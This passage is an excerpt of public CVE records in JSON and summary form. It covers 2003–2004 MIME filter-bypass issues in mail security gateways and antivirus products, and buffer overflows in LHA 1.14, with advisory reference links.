          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME Content-Transfer-Encoding mechanism issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109517788100063\u0026w=2"
          },
          {
            "name": "mime-contenttransfer-filter-bypass(17337)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17337"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard but frequently supported Content-Transfer-Encoding values such as (1) uuencode, (2) mac-binhex40, and (3) yenc, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME Content-Transfer-Encoding mechanism issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109517788100063\u0026w=2"
        },
        {
          "name": "mime-contenttransfer-filter-bypass(17337)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17337"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0051",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard but frequently supported Content-Transfer-Encoding values such as (1) uuencode, (2) mac-binhex40, and (3) yenc, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME Content-Transfer-Encoding mechanism issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109517788100063\u0026w=2"
            },
            {
              "name": "mime-contenttransfer-filter-bypass(17337)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17337"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0051",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2004-01-14T00:00:00",
    "dateUpdated": "2024-08-08T00:01:23.610Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0052
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 00:01
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard separator characters, or use standard separators incorrectly, within MIME headers, fields, parameters, or values, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:01:23.618Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "mime-separator-filtering-bypass(17334)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17334"
          },
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME separator issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109517669115891\u0026w=2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard separator characters, or use standard separators incorrectly, within MIME headers, fields, parameters, or values, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "mime-separator-filtering-bypass(17334)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17334"
        },
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME separator issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109517669115891\u0026w=2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0052",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard separator characters, or use standard separators incorrectly, within MIME headers, fields, parameters, or values, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "mime-separator-filtering-bypass(17334)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17334"
            },
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME separator issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109517669115891\u0026w=2"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0052",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2004-01-14T00:00:00",
    "dateUpdated": "2024-08-08T00:01:23.618Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-0930
Vulnerability from cvelistv5
Published
2004-08-18 04:00
Modified
2024-08-08 02:12
Severity ?
Summary
Clearswift MAILsweeper before 4.3.15 does not properly detect filenames in BinHex (HQX) encoded files, which allows remote attackers to bypass intended policy.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:12:34.428Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.corsaire.com/advisories/c030807-001.txt"
          },
          {
            "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-08-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect filenames in BinHex (HQX) encoded files, which allows remote attackers to bypass intended policy."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.corsaire.com/advisories/c030807-001.txt"
        },
        {
          "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-0930",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect filenames in BinHex (HQX) encoded files, which allows remote attackers to bypass intended policy."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.corsaire.com/advisories/c030807-001.txt",
              "refsource": "MISC",
              "url": "http://www.corsaire.com/advisories/c030807-001.txt"
            },
            {
              "name": "20040813 Corsaire Security Advisory - Clearswift MAILsweeper multiple encoding/compression issues",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-0930",
    "datePublished": "2004-08-18T04:00:00",
    "dateReserved": "2003-11-05T00:00:00",
    "dateUpdated": "2024-08-08T02:12:34.428Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-1014
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 02:12
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use multiple MIME fields with the same name, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:12:35.312Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field multiple occurrence issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109517732328759\u0026w=2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          },
          {
            "name": "mime-field-filtering-bypass(17333)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17333"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use multiple MIME fields with the same name, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field multiple occurrence issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109517732328759\u0026w=2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        },
        {
          "name": "mime-field-filtering-bypass(17333)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17333"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-1014",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use multiple MIME fields with the same name, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field multiple occurrence issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109517732328759\u0026w=2"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            },
            {
              "name": "mime-field-filtering-bypass(17333)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17333"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-1014",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2003-12-17T00:00:00",
    "dateUpdated": "2024-08-08T02:12:35.312Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0234
Vulnerability from cvelistv5
Published
2004-05-05 04:00
Modified
2024-08-08 00:10
Severity ?
Summary
Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive.
References
http://securitytracker.com/id?1015866vdb-entry, x_refsource_SECTRACK
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840vendor-advisory, x_refsource_CONECTIVA
http://www.osvdb.org/5753vdb-entry, x_refsource_OSVDB
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977vdb-entry, signature, x_refsource_OVAL
http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.htmlvendor-advisory, x_refsource_FEDORA
http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.htmlmailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/10243vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/1220vdb-entry, x_refsource_VUPEN
http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.htmlmailing-list, x_refsource_FULLDISC
http://secunia.com/advisories/19514third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/5754vdb-entry, x_refsource_OSVDB
http://www.redhat.com/support/errata/RHSA-2004-179.htmlvendor-advisory, x_refsource_REDHAT
http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txtx_refsource_MISC
https://bugzilla.fedora.us/show_bug.cgi?id=1833vendor-advisory, x_refsource_FEDORA
http://www.debian.org/security/2004/dsa-515vendor-advisory, x_refsource_DEBIAN
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881vdb-entry, signature, x_refsource_OVAL
http://marc.info/?l=bugtraq&m=108422737918885&w=2mailing-list, x_refsource_BUGTRAQ
http://security.gentoo.org/glsa/glsa-200405-02.xmlvendor-advisory, x_refsource_GENTOO
http://www.redhat.com/support/errata/RHSA-2004-178.htmlvendor-advisory, x_refsource_REDHAT
https://exchange.xforce.ibmcloud.com/vulnerabilities/16012vdb-entry, x_refsource_XF
http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.htmlmailing-list, x_refsource_FULLDISC
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:10:03.930Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1015866",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015866"
          },
          {
            "name": "CLA-2004:840",
            "tags": [
              "vendor-advisory",
              "x_refsource_CONECTIVA",
              "x_transferred"
            ],
            "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
          },
          {
            "name": "5753",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/5753"
          },
          {
            "name": "oval:org.mitre.oval:def:977",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
          },
          {
            "name": "FEDORA-2004-119",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
          },
          {
            "name": "20060403 Barracuda LHA archiver security bug leads to remote compromise",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
          },
          {
            "name": "10243",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/10243"
          },
          {
            "name": "ADV-2006-1220",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/1220"
          },
          {
            "name": "20040501 LHa buffer overflows and directory traversal problems",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
          },
          {
            "name": "19514",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19514"
          },
          {
            "name": "5754",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/5754"
          },
          {
            "name": "RHSA-2004:179",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
          },
          {
            "name": "FLSA:1833",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
          },
          {
            "name": "DSA-515",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2004/dsa-515"
          },
          {
            "name": "oval:org.mitre.oval:def:9881",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
          },
          {
            "name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
          },
          {
            "name": "GLSA-200405-02",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
          },
          {
            "name": "RHSA-2004:178",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
          },
          {
            "name": "lha-multiple-bo(16012)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
          },
          {
            "name": "20040502 Lha local stack overflow Proof Of Concept Code",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-04-30T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-10-10T00:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1015866",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015866"
        },
        {
          "name": "CLA-2004:840",
          "tags": [
            "vendor-advisory",
            "x_refsource_CONECTIVA"
          ],
          "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
        },
        {
          "name": "5753",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/5753"
        },
        {
          "name": "oval:org.mitre.oval:def:977",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
        },
        {
          "name": "FEDORA-2004-119",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
        },
        {
          "name": "20060403 Barracuda LHA archiver security bug leads to remote compromise",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
        },
        {
          "name": "10243",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/10243"
        },
        {
          "name": "ADV-2006-1220",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1220"
        },
        {
          "name": "20040501 LHa buffer overflows and directory traversal problems",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
        },
        {
          "name": "19514",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19514"
        },
        {
          "name": "5754",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/5754"
        },
        {
          "name": "RHSA-2004:179",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
        },
        {
          "name": "FLSA:1833",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
        },
        {
          "name": "DSA-515",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2004/dsa-515"
        },
        {
          "name": "oval:org.mitre.oval:def:9881",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
        },
        {
          "name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
        },
        {
          "name": "GLSA-200405-02",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
        },
        {
          "name": "RHSA-2004:178",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
        },
        {
          "name": "lha-multiple-bo(16012)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
        },
        {
          "name": "20040502 Lha local stack overflow Proof Of Concept Code",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0234",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1015866",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015866"
            },
            {
              "name": "CLA-2004:840",
              "refsource": "CONECTIVA",
